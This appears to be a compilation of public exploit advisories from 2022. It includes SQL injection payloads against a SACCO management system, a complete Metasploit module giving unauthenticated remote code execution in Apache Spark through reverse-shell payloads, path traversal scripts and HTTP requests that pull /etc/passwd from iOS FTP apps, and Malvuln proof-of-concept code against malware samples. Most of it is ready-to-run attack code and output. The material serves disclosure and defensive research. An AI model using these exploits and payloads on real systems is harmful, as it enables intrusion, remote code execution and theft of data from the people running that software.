<pre><code>## Title: SACCO-2022 SQLi<br />## Author: nu11secur1ty<br />## Date: 08.27.2022<br />## Vendor: https://www.mayurik.com/<br />## Software: https://www.sourcecodester.com/php/15372/open-source-sacco-management-system-free-download.html<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/SACCO<br /><br />## Description:<br />The `username` parameter from the SACCO-2022 system appears to be<br />vulnerable to SQL injection attacks.<br />The malicious user can dump-steal the database, from this system and<br />he can use it for very malicious purposes.<br /><br />STATUS: HIGH Vulnerability<br /><br />[+]Payload:<br />```mysql<br />---<br />Parameter: username (POST)<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: username=mayuri.infospace@gmail.com' AND (SELECT 6479<br />FROM(SELECT COUNT(*),CONCAT(0x71786a7671,(SELECT<br />(ELT(6479=6479,1))),0x71767a7871,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)# UWlq&password=admin<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: username=mayuri.infospace@gmail.com' AND (SELECT 7854<br />FROM (SELECT(SLEEP(5)))OzkN)# Lpgs&password=admin<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/SACCO)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/iswun6)<br /><br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />require 'rex/stopwatch'<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Apache Spark Unauthenticated Command Injection RCE',<br /> 'Description' => %q{<br /> This module exploits an unauthenticated command injection vulnerability in Apache Spark.<br /> Successful exploitation results in remote code execution under the context of the Spark application user.<br /><br /> The command injection occurs because Spark checks the group membership of the user passed<br /> in the ?doAs parameter by using a raw Linux command.<br /><br /> It is triggered by a non-default setting called spark.acls.enable.<br /> This configuration setting spark.acls.enable should be set true in the Spark configuration to make the application vulnerable for this attack.<br /><br /> Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1 are affected by this vulnerability.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'Kostya Kortchinsky', # Security researcher and discovery of the vulnerability<br /> 'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Author & Metasploit module<br /> ],<br /> 'References' => [<br /> ['URL', 'https://lists.apache.org/thread/p847l3kopoo5bjtmxrcwk21xp6tjxqlc'], # Disclosure<br /> ['URL', 'https://attackerkb.com/topics/5FyKBES4BL/cve-2022-33891'], # Analysis<br /> ['CVE', '2022-33891']<br /> ],<br /> 'DefaultOptions' => {<br /> 'SSL' => false,<br /> 'WfsDelay' => 5<br /> },<br /> 'Platform' => %w[unix linux],<br /> 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],<br /> 'Targets' => [<br /> [<br /> 'Unix (In-Memory)',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :in_memory,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/reverse_python'<br /> }<br /> }<br /> ],<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'Type' => :dropper,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'<br /> }<br /> }<br /> ]<br /> ],<br /> 'CmdStagerFlavor' => ['printf', 'curl'],<br /> 'DefaultTarget' => 0,<br /> 'Privileged' => false,<br /> 'DisclosureDate' => '2022-07-18',<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS]<br /> }<br /> )<br /> )<br /> register_options(<br /> [<br /> Opt::RPORT(8080),<br /> OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/'])<br /> ]<br /> )<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> b64 = Rex::Text.encode_base64(cmd)<br /> post_data = "doAs=\`echo #{b64} | base64 -d | bash\`"<br /><br /> return send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, '/'),<br /> 'data' => post_data<br /> })<br /> rescue Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, Errno::ETIMEDOUT => e<br /> elog("A communication error occurred: #{e.message}", error: e)<br /> end<br /><br /> def check<br /> print_status("Checking if #{peer} can be exploited!")<br /><br /> res = execute_command("echo #{Rex::Text.rand_text_alpha_lower(8..12)}")<br /><br /> return CheckCode::Unknown('Did not receive a response from target.') unless res<br /><br /> if res.code != 403<br /> return CheckCode::Safe('Target did not respond with a 403 response.')<br /> end<br /><br /> sleep_time = rand(5..10)<br /> print_status("Performing command injection test issuing a sleep command of #{sleep_time} seconds.")<br /><br /> res, elapsed_time = Rex::Stopwatch.elapsed_time do<br /> execute_command("sleep #{sleep_time}")<br /> end<br /><br /> print_status("Elapsed time: #{elapsed_time} seconds.")<br /><br /> unless res && elapsed_time >= sleep_time<br /> return CheckCode::Safe('Failed to test command injection.')<br /> end<br /><br /> CheckCode::Vulnerable('Successfully tested command injection.')<br /> end<br /><br /> def exploit<br /> print_status('Exploiting...')<br /> case target['Type']<br /> when :in_memory<br /> execute_command(payload.encoded)<br /> when :dropper<br /> execute_cmdstager(linemax: 1024) # set an appropriate :linemax dependent upon available space<br /> end<br /> end<br />end<br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/44aba241dd3f0d156c6ed82a0ab3a9e1.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Trojan-Ransom.Win32.Hive.bv<br />Vulnerability: Arbitrary Code Execution<br />Description: Hive Ransomware will load and execute arbitrary .EXE PE files if a third-party adversary or defender uses the vulnerable naming convention of "vssadmin.exe" or "wmic.exe" and the PE file is placed in the vacinity of Hive Ransomware when it is executed.<br />Family: Hive<br />Type: PE64<br />MD5: 44aba241dd3f0d156c6ed82a0ab3a9e1<br />Vuln ID: MVID-2022-0636<br />Disclosure: 09/06/2022<br /><br /><br />Exploit/PoC:<br />1) Compile to "vssadmin.exe"<br />2) Supplying Hive CL credentials e.g. -u <login>:<password><br /><br />"vssadmin.c"<br /><br />#include "windows.h"<br />#include "tlhelp32.h"<br />#include "psapi.h"<br /><br />//Compiled x64<br />//By Malvuln - 2022<br />//Purpose: RCE PWN Hive Ransomware<br />//MD5: 44aba241dd3f0d156c6ed82a0ab3a9e1<br />/** DISCLAIMER:<br />Author is NOT responsible for any damages whatsoever by using this software or improper malware<br />handling. By using this code you assume and accept all risk implied or otherwise.<br />**/<br /><br />DWORD getParentPID(DWORD pid){<br /> HANDLE h32 = NULL;<br /> PROCESSENTRY32 pe = {0};<br /> DWORD ppid = 0;<br /> pe.dwSize = sizeof(PROCESSENTRY32);<br /> h32 = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);<br /> if(Process32First(h32, &pe)){<br /> do{<br /> if (pe.th32ProcessID == pid){<br /> ppid = pe.th32ParentProcessID;<br /> break;<br /> }<br /> } while( Process32Next(h32, &pe));<br /> }<br /> CloseHandle(h32);<br /> return (ppid);<br />}<br /><br />int main(void){<br /> DWORD ppid = getParentPID(GetCurrentProcessId());<br /> HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE, ppid);<br /> if (NULL != handle) { <br /> TerminateProcess(handle, 0);<br /> CloseHandle(handle);<br /> MessageBox(NULL, "Not the vssadmin.exe you wanted :(\nHive Ransomware PWNED!\n\nBy Malvuln", "Code Execution PoC\n", MB_OK);<br /> }<br /> return 0;<br />}<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/d871836f77076eeed87eb0078c1911c7_B.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Trojan.Win32.Autoit.fhj<br />Vulnerability: Named Pipe Null DACL<br />Family: Autoit<br />Type: PE32<br />MD5: d871836f77076eeed87eb0078c1911c7<br />Vuln ID: MVID-2022-0638<br />Disclosure: 09/06/2022<br />Description: The malware creates two processes "xservice.exe" and a child process "xps.exe". The process creates an IPC pipe with a NULL DACL allowing RW for the Everyone user group.<br /><br />RManFUSCallbackNotify32 <br />RManFUSServerNotify32<br /><br />\\.\Pipe\RManFUSCallbackNotify32<br />RW Everyone<br /><br />Local low privileged users can modify the DACL to remove rights for the Everyone users group, denying access to use the pipe for further RW interprocess communications.<br /><br />Exploit/PoC:<br />#include "windows.h"<br />#include "stdio.h"<br />#include "accctrl.h"<br />#include "aclapi.h"<br /><br />/*<br />Trojan.Win32.Autoit.fhj.d871836f77076eeed87eb0078c1911c7 <br />NamedPipe Exploit Deny Access to Everyone<br />By Malvuln<br />**/<br /><br />#define VULN_TROJAN_PIPE "\\\\.\\pipe\\RManFUSCallbackNotify32"<br /><br />int main(void){<br /><br /> HANDLE hPipe = CreateFileA((LPCSTR)VULN_TROJAN_PIPE, GENERIC_WRITE | WRITE_DAC, 0, NULL, OPEN_EXISTING, NULL, NULL);<br /> PACL pOldDACL = NULL;<br /> PACL pNewDACL = NULL;<br /> <br />if (hPipe == INVALID_HANDLE_VALUE){ <br /> printf("%d", GetLastError()); <br /> return 1;<br />}<br /> <br /> if(GetSecurityInfo(hPipe, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, &pOldDACL, NULL, NULL) != ERROR_SUCCESS){<br /> printf("%d", GetLastError());<br /> return 1;<br /> }<br /> <br /> TRUSTEE trustee[1];<br /> trustee[0].TrusteeForm = TRUSTEE_IS_NAME;<br /> trustee[0].TrusteeType = TRUSTEE_IS_GROUP;<br /> trustee[0].ptstrName = TEXT("Everyone");<br /> trustee[0].MultipleTrusteeOperation = NO_MULTIPLE_TRUSTEE;<br /> trustee[0].pMultipleTrustee = NULL;<br /><br /> EXPLICIT_ACCESS explicit_access_list[1];<br /> ZeroMemory(&explicit_access_list[0], sizeof(EXPLICIT_ACCESS));<br /><br /> explicit_access_list[0].grfAccessMode = DENY_ACCESS; <br /> explicit_access_list[0].grfAccessPermissions = GENERIC_ALL;<br /> explicit_access_list[0].grfInheritance = NO_INHERITANCE;<br /> explicit_access_list[0].Trustee = trustee[0];<br /> <br /> if(SetEntriesInAcl(1, explicit_access_list, pOldDACL, &pNewDACL) != ERROR_SUCCESS){<br /> printf("%d", GetLastError());<br /> return 1;<br /> }<br /> <br /> if(SetSecurityInfo(hPipe, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDACL, NULL) != ERROR_SUCCESS){ <br /> printf("%d", GetLastError());<br /> return 1; <br /> }else{<br /> printf("Trojan.Win32.Autoit.fhj PWNED!\n");<br /> printf("By Malvuln\n");<br /> }<br /> <br /> LocalFree(pNewDACL);<br /> LocalFree(pOldDACL);<br /> CloseHandle(hPipe);<br /><br /> system("pause");<br /><br />return 0;<br />}<br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: FE File Explorer 11.0.4 Local File inclusion<br /># Date: Sep 6, 2022<br /># Exploit Author: Chokri Hammedi<br /># Vendor Homepage: https://www.skyjos.com/<br /># Software Link:<br />https://apps.apple.com/us/app/fe-file-explorer-file-manager/id510282524<br /># Version: 11.0.4<br /># Tested on: iPhone ios 15.6<br /><br /><br />from ftplib import FTP<br />import argparse<br /><br />help = " FE File Explorer Local File inclusion"<br />parser = argparse.ArgumentParser(description=help)<br />parser.add_argument("--target", help="Target IP", required=True)<br />parser.add_argument("--file", help="File To Open eg: etc/passwd")<br /><br />args = parser.parse_args()<br /><br /><br />ip = args.target<br />port = 2121 # Default Port<br />files = args.file<br /><br /><br /><br />ftpConnection = FTP()<br />ftpConnection.connect(host=ip, port=port)<br />ftpConnection.login();<br /><br />def downloadFile():<br /><br />ftpConnection.cwd('/../../../../../../../../../../../../../../../../')<br /> ftpConnection.retrbinary(f"RETR {files}", open('data.txt',<br />'wb').write)<br /> ftpConnection.close()<br /> file = open('data.txt', 'r')<br /> print (f"[***] The contents of {files}\n")<br /> print (file.read())<br /><br />downloadFile()<br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/8c0e6ec6b8ac9eb1169e63df71f24456.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Trojan-Spy.Win32.Pophot.bsl<br />Vulnerability: Insecure Permissions<br />Description: The malware writes a BATCH file ".bat" to c drive granting change (C) permissions to the authenticated user group. Standard users can rename the file dropped by the malware to disable it or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges. <br />Family: Pophot<br />Type: PE32<br />MD5: 8c0e6ec6b8ac9eb1169e63df71f24456<br />Vuln ID: MVID-2022-0635<br />Disclosure: 09/06/2022 <br /><br />Exploit/PoC:<br />C:\>type zhqbdf.bat<br /><br />"C:\WINDOWS\system\zhqbs080722.exe" i<br />del %0<br /><br />C:\>cacls zhqbdf.bat<br />C:\zhqbdf.bat BUILTIN\Administrators:(ID)F<br /> NT AUTHORITY\SYSTEM:(ID)F<br /> BUILTIN\Users:(ID)R<br /> NT AUTHORITY\Authenticated Users:(ID)C<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/121bf601275e2aed0c3a6fe7910f9826.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Hupigon.aspg<br />Vulnerability: Insecure Service Path<br />Description: The malware creates a service with an unquoted path. Attackers who can place an arbitrary executable named "Program.exe" under c:\ drive can potentially undermine the malware by having it run theirs instead with LocalSystem privs.<br />Family: Hupigon<br />Type: PE32<br />MD5: 121bf601275e2aed0c3a6fe7910f9826<br />Vuln ID: MVID-2022-0634<br />Disclosure: 09/06/2022<br /><br />Exploit/PoC:<br />C:\dump>sc qc VServer_2007<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: VServer_2007<br /> TYPE : 110 WIN32_OWN_PROCESS (interactive)<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 0 IGNORE<br /> BINARY_PATH_NAME : C:\Program Files\Common Files\Microsoft Shared\MSInfo\R_Server.exe<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : V_Server<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/5bc5f72d19019a2fa3b75896e82ae1e5.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Winshell.5_0<br />Vulnerability: Weak Hardcoded Credentials<br />Description: The malware is UPX packed, listens on TCP port 5277 and requires authentication for remote access. However, the password "123456789" is weak and hardcoded within the PE file. Unpacking the executable, easily reveals the cleartext password.<br />Family: Winshell<br />Type: PE<br />MD5: 5bc5f72d19019a2fa3b75896e82ae1e5<br />Vuln ID: MVID-2022-0633<br />Disclosure: 09/06/2022<br /><br />Exploit/PoC:<br />C:\>nc64.exe x.x.x.x 5277<br />Password:123456789<br /><br />WinShell v5.0 (C)2002 janker.org<br /><br />? for help<br />CMD>?<br /><br />i Install<br />r Remove<br />p Path<br />b reBoot<br />d shutDown<br />s Shell<br />x eXit<br />q Quit<br /><br />Download:<br />CMD>http://.../srv.exe<br /><br />? for help<br />CMD>s<br />Microsoft Windows [Version 10.0.16299.309]<br />(c) 2017 Microsoft Corporation. All rights reserved.<br /><br />C:\dump><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: FTPManager 8.2 Local File inclusion<br /># Date: Sep 6, 2022<br /># Exploit Author: Chokri Hammedi<br /># Vendor Homepage: https://www.skyjos.com/<br /># Software Link:<br />https://apps.apple.com/us/app/ftpmanager-ftp-sftp-client/id525959186<br /># Version: 8.2<br /># Tested on: Ios 15.6<br /><br /><br /><br />GET /../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1<br />Host: 192.168.1.178:8080<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X)<br />AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e<br />Safari/8536.25<br />Accept:<br />text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Connection: close<br /><br /><br /><br /><br />------------------<br /><br />HTTP/1.1 200 OK<br />Connection: Close<br />Server: GCDWebUploader<br />Content-Type: application/octet-stream<br />Last-Modified: Wed, 13 Jul 2022 10:35:46 GMT<br />Date: Tue, 06 Sep 2022 03:05:05 GMT<br />Content-Length: 2581<br />Cache-Control: max-age=3600, public<br />Etag: 1152921500312311384/1657708546/0<br /><br />##<br /># User Database<br />#<br /># This file is the authoritative user database.<br />##<br />nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false<br />root:/smx7MYTQIi2M:0:0:System Administrator:/var/root:/bin/sh<br />mobile:/smx7MYTQIi2M:501:501:Mobile User:/var/mobile:/bin/sh<br />daemon:*:1:1:System Services:/var/root:/usr/bin/false<br />_ftp:*:98:-2:FTP Daemon:/var/empty:/usr/bin/false<br />_networkd:*:24:24:Network Services:/var/networkd:/usr/bin/false<br />_wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false<br />_installd:*:33:33:Install Daemon:/var/installd:/usr/bin/false<br />_neagent:*:34:34:NEAgent:/var/empty:/usr/bin/false<br />_ifccd:*:35:35:ifccd:/var/empty:/usr/bin/false<br />_securityd:*:64:64:securityd:/var/empty:/usr/bin/false<br />_mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false<br />_sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false<br />_unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false<br />_usbmuxd:*:213:213:iPhone OS Device Helper:/var/db/lockdown:/usr/bin/false<br />_distnote:*:241:241:Distributed Notifications:/var/empty:/usr/bin/false<br />_astris:*:245:245:Astris Services:/var/db/astris:/usr/bin/false<br />_ondemand:*:249:249:On Demand Resource<br />Daemon:/var/db/ondemand:/usr/bin/false<br />_findmydevice:*:254:254:Find My Device<br />Daemon:/var/db/findmydevice:/usr/bin/false<br />_datadetectors:*:257:257:DataDetectors:/var/db/datadetectors:/usr/bin/false<br />_captiveagent:*:258:258:captiveagent:/var/empty:/usr/bin/false<br />_analyticsd:*:263:263:Analytics Daemon:/var/db/analyticsd:/usr/bin/false<br />_timed:*:266:266:Time Sync Daemon:/var/db/timed:/usr/bin/false<br />_gpsd:*:267:267:GPS Daemon:/var/db/gpsd:/usr/bin/false<br />_reportmemoryexception:*:269:269:ReportMemoryException:/var/empty:/usr/bin/false<br />_driverkit:*:270:270:DriverKit:/var/empty:/usr/bin/false<br />_diskimagesiod:*:271:271:DiskImages IO<br />Daemon:/var/db/diskimagesiod:/usr/bin/false<br />_logd:*:272:272:Log Daemon:/var/db/diagnostics:/usr/bin/false<br />_iconservices:*:276:276:Icon services:/var/empty:/usr/bin/false<br />_rmd:*:277:277:Remote Management Daemon:/var/db/rmd:/usr/bin/false<br />_accessoryupdater:*:278:278:Accessory Update<br />Daemon:/var/db/accessoryupdater:/usr/bin/false<br />_knowledgegraphd:*:279:279:Knowledge Graph<br />Daemon:/var/db/knowledgegraphd:/usr/bin/false<br />_coreml:*:280:280:CoreML Services:/var/empty:/usr/bin/false<br />_sntpd:*:281:281:SNTP Server Daemon:/var/empty:/usr/bin/false<br />_trustd:*:282:282:trustd:/var/empty:/usr/bin/false<br />_mmaintenanced:*:283:283:mmaintenanced:/var/db/mmaintenanced:/usr/bin/false<br />_darwindaemon:*:284:284:Darwin Daemon:/var/db/darwindaemon:/usr/bin/false<br />_notification_proxy:*:285:285:Notification Proxy:/var/empty:/usr/bin/false<br /><br /><br /><br />---------------------------------------------------<br /><br /># Exploit Title: FTPManager 8.2 Directory Traversal (ftp)<br /># Date: Sep 6, 2022<br /># Exploit Author: Chokri Hammedi<br /># Vendor Homepage: https://www.skyjos.com/<br /># Software Link:<br />https://apps.apple.com/us/app/ftpmanager-ftp-sftp-client/id525959186<br /># Version: 8.2<br /># Tested on: ios 15.6<br /><br /><br />#ftp 192.168.1.178 2121<br />Connected to 192.168.1.178.<br />220 ---------- Welcome to FTPManager ----------<br />Name (192.168.1.178:chokri):<br />230 User chokri logged in.<br />Remote system type is UNIX.<br />Using binary mode to transfer files.<br />ftp> cd /../../../../../../../../../../../../../../../../<br />250 OK. Current directory is<br />/../../../../../../../../../../../../../../../../<br />ftp> ls<br />200 PORT command successful.<br />150 Accepted data connection<br />total 10<br />drwxr-xr-x 0 root wheel 256 Jan 01 1970 usr<br />drwxr-xr-x 0 root wheel 128 Jan 01 1970 bin<br />drwxr-xr-x 0 root wheel 576 Jan 01 1970 sbin<br />drwxr-xr-x 0 root wheel 160 Jan 01 1970 System<br />drwxr-xr-x 0 root wheel 672 Jan 01 1970 Library<br />drwxr-xr-x 0 root wheel 224 Jan 01 1970 private<br />drwxr-xr-x 0 root wheel 1132 Jan 01 1970 dev<br />drwxr-xr-x 0 root admin 3968 Jan 01 1970 Applications<br />drwxr-xr-x 0 root admin 64 Jan 01 1970 Developer<br />drwxr-xr-x 0 root admin 64 Jan 01 1970 cores<br />WARNING! 10 bare linefeeds received in ASCII mode<br />File may not have transferred correctly.<br />226 Transfer complete.<br />ftp> cd private/etc<br />250 OK. Current directory is<br />/../../../../../../../../../../../../../../../../private/etc<br />ftp> get passwd<br />local: passwd remote: passwd<br />200 PORT command successful.<br />150 Opening BINARY mode data connection for 'passwd'.<br />226 Transfer complete.<br />2581 bytes received in 0.00 secs (11.5020 MB/s)<br />ftp> get services<br />local: services remote: services<br />200 PORT command successful.<br />150 Opening BINARY mode data connection for 'services'.<br />226 Transfer complete.<br />677977 bytes received in 0.17 secs (3.8257 MB/s)<br /><br /><br /><br />---------------------------------------------------<br /><br /><br /><br /><br /># Exploit Title: FTPManager 8.2 Local File inclusion (ftp) python<br /># Date: Sep 6, 2022<br /># Exploit Author: Chokri Hammedi<br /># Vendor Homepage: https://www.skyjos.com/<br /># Software Link:<br />https://apps.apple.com/us/app/ftpmanager-ftp-sftp-client/id525959186<br /># Version: 8.2<br /># Tested on: ios 15.6<br /><br /><br />from ftplib import FTP<br />import argparse<br /><br />help = " FTPManager 8.2 Local File inclusion by chokri hammedi"<br />parser = argparse.ArgumentParser(description=help)<br />parser.add_argument("--target", help="Target IP", required=True)<br />parser.add_argument("--file", help="File To Open eg: etc/passwd")<br /><br />args = parser.parse_args()<br /><br /><br />ip = args.target<br />port = 2121 # Default Port<br />files = args.file<br /><br /><br /><br />ftpConnection = FTP()<br />ftpConnection.connect(host=ip, port=port)<br />ftpConnection.login();<br /><br />def downloadFile():<br /><br />ftpConnection.cwd('/../../../../../../../../../../../../../../../../')<br /> ftpConnection.retrbinary(f"RETR {files}", open('data.txt',<br />'wb').write)<br /> ftpConnection.close()<br /> file = open('data.txt', 'r')<br /> print (f"[***] The contents of {files}\n")<br /> print (file.read())<br /><br />downloadFile()<br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/d871836f77076eeed87eb0078c1911c7.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Trojan.Win32.Autoit.fhj<br />Vulnerability: Insecure Permissions<br />Description: The malware writes two hidden DLL files "vp8decoder.dll" and "vp8encoder.dll" to its installation directory granting full (F) permissions to the Everyone user group. Any user can replace the PE files dropped by the malware to disable it or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges. <br />Family: Autoit<br />Type: PE32<br />MD5: d871836f77076eeed87eb0078c1911c7<br />Vuln ID: MVID-2022-0637<br />Disclosure: 09/06/2022<br /><br />Exploit/PoC:<br />insecure dir permissions for two DLL's with bunch hidden files<br /><br />C:\Program Files (x86)\XPS Rasterization Service Component>attrib -s -h *<br />C:\Program Files (x86)\XPS Rasterization Service Component>cacls *<br />C:\Program Files (x86)\XPS Rasterization Service Component\vp8decoder.dll Everyone:F<br />C:\Program Files (x86)\XPS Rasterization Service Component\vp8encoder.dll Everyone:F<br /><br /><br />Directory of C:\Program Files (x86)\XPS Rasterization Service Component<br /><br />09/05/2022 12:18 AM 1,165 Log(05.09.2022).txt<br />09/05/2022 12:15 AM 803,971 Screen(00_15).jpg<br />02/21/2017 02:58 PM 2,665 settings.dat<br />07/15/2015 12:19 PM 143,568 vp8decoder.dll<br />07/15/2015 12:19 PM 539,856 vp8encoder.dll<br />09/05/2022 12:15 AM 2,052,816 xps.exe<br />02/21/2017 01:24 PM 2,031,104 xservice.exe<br /> 7 File(s) 5,575,145 bytes<br /><br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>